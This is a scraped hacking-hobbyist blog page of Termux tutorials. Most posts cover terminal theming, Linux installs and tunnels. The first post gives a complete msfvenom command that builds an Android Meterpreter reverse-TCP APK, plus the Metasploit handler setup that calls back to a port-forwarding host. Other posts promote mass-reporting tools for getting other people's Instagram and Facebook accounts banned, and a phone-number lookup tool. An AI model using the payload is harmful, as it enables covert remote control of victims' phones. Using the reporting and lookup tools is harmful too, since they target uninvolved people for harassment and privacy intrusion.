Skip to main content

Posts

Showing posts from May, 2022

Port forwarding by rajbhx

How to Port forwarding For Msfvenom for making Apk payload msfvenom android/meterpreter/reverse_tcp LHOST=mstrHacker-62210.portmap.io LPORT=62210 R -o /sdcard/rajbhx.apk For Msfconsole controlling use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost mstrHacker-62210.portmap.io set lport 5555 set ExitOnSession exploit

How to Extract Android OTA Payload.bin File using Payload Dumper Tool on Android Device #rajbhx

How to Extract Android OTA Payload.bin File using Payload Dumper Tool on a PC or Android Device Introduction: Extracting the Android OTA (Over-The-Air) payload file, known as payload.bin, can be useful for various purposes such as creating custom ROMs or analyzing firmware updates. The Payload Dumper tool provides an easy way to extract the contents of the payload.bin file. This article will guide you through the extraction process on both a PC and an Android device. Extraction on a PC: 1. Install Python: Payload Dumper Tool is a Python program, so you'll need to have Python 3 or higher installed on your PC. Download and install Python from the official website. 2. Download Payload Dumper Tool: Get the latest version of the Payload Dumper Tool from the provided link and extract its contents to a suitable location. You should have a folder named "payload_dumper." 3. Obtain the OTA Package: Download the complete ZIP OTA package for your specific Android device. Extract the ...

How to customize Termux looks | created by github user nihsx | mayTermux terminal

How to customize Termux looks | created by github user nihsx | mayTermux terminal Video time 1:00pm Tutorial link Make your Termux look better pkg update && pkg upgrade pkg i -y git bc Installation • Clone repo for GitHub git clone --depth=1 https://github.com/mayTermux/myTermux.git Run Installer script cd myTermux export COLUMNS LINES ./install.sh If you get error message Please Zoom Out. Zoom Out on Termux Application then run again the script ZSH Theme •Change ZSH Theme with command: chzsh Fonts •Change font used with command : chfont Colorscheme (Theme) •Change colorscheme or theme with command: chcolor Credits xShin as nihsx siduck  owl4ce  adi1090x  bandithijo  lwotcynna  nekonako Dotfiles Indonesia Vim Indonesia Bashid.org

How to install Ubuntu + GUI + Sound support In Termux

Installing Modded Ubuntu with GUI and Sound Support in Termux What is Modded Ubuntu? Modded Ubuntu is a unique Desktop Environment project that brings Ubuntu with a fully functional GUI, sound, and music support to Termux on Android. Unlike other projects that only offer GUI support, Modded Ubuntu stands out with its comprehensive feature set. Key Features: Fixed Audio Output : Enjoy seamless sound and music playback Lightweight : Requires a minimum of 4GB Storage for smooth operation Katoolin3 Tool : Easily install Kali tools for enhanced functionality Dual Browsers : Chromium and Mozilla Firefox for versatile browsing Bangla Fonts Support : Enhanced language support for regional users VLC Media Player : Play various media formats with ease Visual Studio Code (with known bugs on ARM architecture) Beginner-Friendly : Easy to set up and navigate Installation Guide: Step 1: Update and Prepare Termux Run the following commands in ...

How to install Termux-desktop on termux

How to Install Termux-Desktop Hii folks Welcome back you my new post in this post i will show you How to install Termux-desktop   Required Apps: Termux Termux-API VNC Viewer What is Termux? Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. More Here... How to Install Termux? Install Termux & Termux:API on your phone. Installation After installing both applications above, open Termux and follow the steps below: pkg upgrade && pkg install git Clone this Repository git clone https://github.com/adi1090x/termux-desktop.git Warning: I'm assuming that you're doing this on a fresh Termux install. If not, I'll suggest you to do so. Run Setup Script cd termux-desktop chmod +x setup.sh ./setup.sh --ins...

How to Enable/use wireless debugging android 11 कैसे ओपन करें वायरलेस डि बगिंग

How to Enable/use wireless debugging android 11 Requirement Android 11 or Above Steps To start  How to enable Developer options 1. Go to "Settings", then tap "About device" or "About phone".      2. Scroll down, then tap "Build number " seven times. Depending on your device and operating system, you may need to tap "Software information", then tap "Build number" seven times.

DockerSecurityPlayground - A Microservices-based Framework @rajbhx

DockerSecurityPlayground - A Microservices-based Framework For The Study Of Network Security And Penetration Test Techniques Docker Security Playground is an application that allows you to: Create  network and network security scenarios , in order to understand network protocols, rules, and security issues by installing DSP in your PC. Learn  penetration testing techniques  by simulating vulnerability labs scenarios Manage a set of docker-compose project   . Main goal of DSP is to learn in penetration testing and network security, but its flexibility allows you the  creation ,  graphic editing   and  managment run / stop   of all your  docker-compose labs . For more information look at the  Labs Managment  page. ...

Firmware Slap - Discovering Vulnerabilities In Firmware Through Concolic Analysis And Function Clustering

Firmware Slap - Discovering Vulnerabilities In Firmware Through Concolic Analysis And Function Clustering Firmware slap combines concolic analysis with function clustering for vulnerability discovery and function similarity in firmware. Firmware slap is built as a series of libraries and exports most information as either pickles or JSON for integration with other tools. Slides from the talk can be found  here Setup Firmware slap should be run in a virtual environment. It has been tested on Python3.6 python setup.py install You will need rabbitmq and (radare2 or Ghidra) # Ubuntu sudo apt install rabbitmq-server # OSX brew install rabbitmq # Radare2 git clone https://github.com/radare/radare2.git sudo ./radare2/sys/install.sh # Ghidra wget https://ghidra-sre.org/ghidra_9.0.4_PUBLIC_20190516.zip unzip ghidra_9.0.4_PUBLIC_20190516.zip -d ghidra echo "export PATH=\$PATH:$PWD/ghidra/ghidra_9.0.4/support" >> ~/.bashrc If you wa...

How to delete Instagram Account by attakercyebr M4nifest0_IG_ReportV4 Report tool Termux

How to delete Instagram Account by  attakercyebr  M4nifest0_IG_ReportV4 Report tool Termux How work M4nifest0_IG_ReportV4 Instagram report tool😻 Deleting someone else's Instagram account, repeat until the target account is blocked. attakercyebr  / M4nifest0_IG_ReportV4 Check out new updated repository We created also blog on Instagram mass reporter , Instagram Reporting 2 and recently created how to install Osintgram Tool in android without using termux app. Don't forget how to install Facebook report tool Instagram delete new method by attakercyebr Tool name :  M4nifest0_IG_ReportV4 🤫

Popular posts from this blog

Cloudflared in Termux to Create tunnels, Port Forwding

Installing Cloudflared in Termux for Android (ngrok Alternative) – 2026 Updated Repository Link https://github.com/rajbhx/cloudflared-termux What Is Cloudflare? Cloudflare, Inc. is an American content delivery network (CDN) and DDoS protection company founded in 2010. It works as a reverse proxy between visitors and the hosting provider, improving security, performance, and reliability. Basic Usage Once installed, Cloudflared can expose a local service to the internet. cloudflared -url localhost:PORT Example: cloudflared -url localhost:8000 Alternative command: cloudflared tunnel localhost:PORT Installation Make sure your Termux app is fully updated before proceeding. Installation Commands Follow the steps below to install Cloudflared using the rajbhx/cloudflared-termux script. 1. Update Termux and install Git pkg update && pkg upgrade pkg install git 2. Clone the Cloudflared Termux repository git ...

[Apk Setup] Alpine-term App | without using termux

Install and Set Up Alpine Term on Android Alpine Term allows you to run a lightweight Linux environment directly on your Android device. This guide explains what Alpine Term is, its requirements, and how to install and use it. What Is Alpine Term? Alpine Term is a terminal and Linux environment app for Android. It runs Alpine Linux inside a headless x86_64 virtual machine powered by QEMU. Interaction with the system happens through terminal sessions connected to the virtual machine’s serial consoles. This setup makes it possible to run Linux commands, scripts, and tools on Android without rooting the device. System Requirements Before installing Alpine Term, ensure your device meets the following requirements: AArch64-based Android device Android 7.0 or higher At least 500 MB of free internal storage Internet connection (for installing or updating packages) Steps to Install Alpine Term Open the Google Play Store on your Android device Search ...

How to install and setup vShell in android app |कैसे इनस्टॉल करें

How to install and setup android vShell(Virtual Shell) app (no root) कैसे इनस्टॉल करें YouTube video link What is Android-vShell app vShell is a  virtual shell environment application  for the Android OS. A virtual Linux shell environment application for Android OS. Runs Alpine Linux in QEMU system emulator.  It provides a virtual machine running small Linux distribution ready for the use out-of-box. Application implements my view on how Linux terminal environments can look like on Android OS. As operating system security is getting more and more hardened over time (which is good btw), it become impossible to abuse design flaws such as executable user data to run Linux native executables. Ability to...

How to extract Details from any mobile number Using termux | rajbhx

How to Extract Details from Any Mobile Number Using Termux Website: jarvisstaraq.blogspot.com What Is truecallerjs? truecallerjs is a simple command-line tool used to search phone number details. It works on Android devices and can be used directly inside the Termux app. Requirements Android phone Termux installed Valid mobile number (required for Truecaller verification) Truecaller Installation ID Installation in Termux Install Node.js, Git, and Wget Open the Termux app. Update the package list: pkg update Install Node.js: pkg install nodejs Install Git: pkg install git Install Wget: pkg install wget Install truecallerjs and Use Its Commands Install truecallerjs globally using npm: npm install -g truecallerjs Verify installation and view available options: truecallerjs -h Log in to your Truec...

How to Install Java (Open-JDK-8) in Termux | two Methods

How to Install Java (OpenJDK 8) in Termux Method 1: Java 8 Installation Introduction This method explains how to install Java (OpenJDK 8) in Termux without rooting your Android device. Step-by-Step Guide Step 1: Install Kali Linux in Termux (Optional) pkg install wget proot -y wget https://raw.githubusercontent.com/MasterDevX/KaliTermux/master/InstallKali.sh bash InstallKali.sh Step 2: Download OpenJDK 8 JRE Deb Package Visit the Debian FTP repository and copy the link to the OpenJDK 8 JRE package. ftp.debian Step 3: Download the Deb Package in Kali wget http://ftp.debian.org/debian/pool/main/o/openjdk-8/openjdk-8-jre-headless_8u275-b01-1_arm64.deb Step 4: Install the Deb Package Manually dpkg -i openjdk-8-jre-headless_8u275-b01-1_arm64.deb Step 5: Change Java Version (Optional) sudo update-alternatives --config java Final Step: Verify Java Version Select the desired Java version (Java 8) by entering the corresponding number when pr...

How to install & use report-fb-account-termux tool in termux

report-fb-account-termux   [+]  Disclaimer : This tool is only for educational purpose. The developer is not responsible for any abuse of it.   [+] Installation apt update && apt upgrade -y apt install git python -y git clone https://github.com/jarvisstar/report-fb-account-termux.git cd autoreport python3 ar.py Or, Use Single Command apt install git python -y && git clone https://github.com/KasRoudra/autoreport && cd autoreport && python3 ar.py Screenshots:   Usage: Search "findfbid" in google to get victim's profile link. Such as Website1 , Website2 , Website3 , Website4 . Enter the victim's facebook profile link in the website, generate and copy the numeric id in clipboard. Run the script and enter or paste that id when asked! [+] Note: AUTOREPORT DOES NOT DISABLE ACCOUNT UNLESS THERE IS SPECIFIC POST(S)...

My IP Address - How to check IP address in Termux

My IP Address - How to check IP address in Termux Here are the steps to check the IP address in various operating systems: Termux (Android): Open the Termux app. Type "ipconfig" and press Enter. Look for "inet" followed by an IP address under the network adapter you are currently using to connect to the internet. Windows: Open the Start menu and type "Command Prompt" in the search bar. Open the Command Prompt and type "ipconfig" and press Enter. Look for "IPv4 Address" or "IPv6 Address" under the network adapter you are currently using to connect to the internet. Android: Open the Settings app. Scroll down and tap on "About phone" or " About device ". Tap on " Status ". Look for "IP address" or " Wi-Fi IP address " under the network section. macOS: Click on the Apple menu in the top-left corner of the screen and select "System Preferences". Click on "N...

My Termux | How to install Lazymux in Termux #rajbhx

My Termux | How to install Lazymux in Termux Lazymux t00ls !nstaller !s very easy t0 use, 0nly pr0v!ded f0r lazy Termux users, just k!dd!ng. Lazymux !s a t00l that !s spec!ally made f0r Termux user wh!ch pr0v!des a l0t 0f t00l ma!nly used t00ls !n Termux, Lazymux !nstall any 0f the g!ven t00ls pr0v!ded by !t fr0m !tself w!th just 0ne cl!ck, and Lazymux always get updated.  What !s Python 3?   My Termux | How to install Lazymux in Termux @rajbhx How to Install Oh My Zsh How to download copyright free GAME PLAY CODM/PUBG/BGMI/FreeFire Call of duty mobile 60fps   How to install FacebookToolkit in Termux + linux + windows 10/11 Download any video with termux using youtube-dl | #rajbhx HOw to install Raspbian 9 (Stretch) in Termux #rajbhx On Decembe...

How to delete Instagram Account by mrwn007 Report tool Termux

How to Delete an Instagram Account Using a Report Tool This post discusses an old Instagram reporting tool that was previously shared by mrwn007 and used through Termux on Android. The tool is no longer functional, but this guide also explains why and provides information on proper reporting methods. Termux (Android) What Is Termux? Termux is an Android terminal emulator and Linux environment app that works without root access. It installs a minimal Linux base system automatically, and additional packages can be installed using the APT package manager. mrwn007 / 007spam-BOT Previously, mrwn007 maintained a repository called 007spam-BOT , which claimed to mass-report Instagram accounts using Termux. Related repositories that once existed: Instagram Mass Reporter (Termux) Instagram Reporting Tool v2 (Termux) Instagram Delete Method (by Crevils) Current status: All of these repositories are no longer available. Why the Tool No Longer Works Th...

How to install | instagram reporting 2 tool termux by jarvisstaraq

How to install | instagram reporting 2 tool termux by jarvisstaraq Assuming the client truly breaks the instagram rule then their is more opportunities to get prohibited. Instagram limits the reports per unit time, apparatus will auto quit revealing later arrived at limit at very nearly 40 reports. Shows "Detailed Succesfully" later Each Request. You can Report target again later some time (later 2-3 min). Use IP of same district for high effecivity. In the event that you enter invalid username it will in any case send report demand. Assuming that you getting mistake on utilizing intermediaries then, at that point, don't. Requirements Python3 Or Above  Need to install git in linux or termux Download GIT Usage Instagram mass reporter [ TERMUX ]  How to delete Instagram Account by mrwn007 Report tool Termux   [ TERMUX ]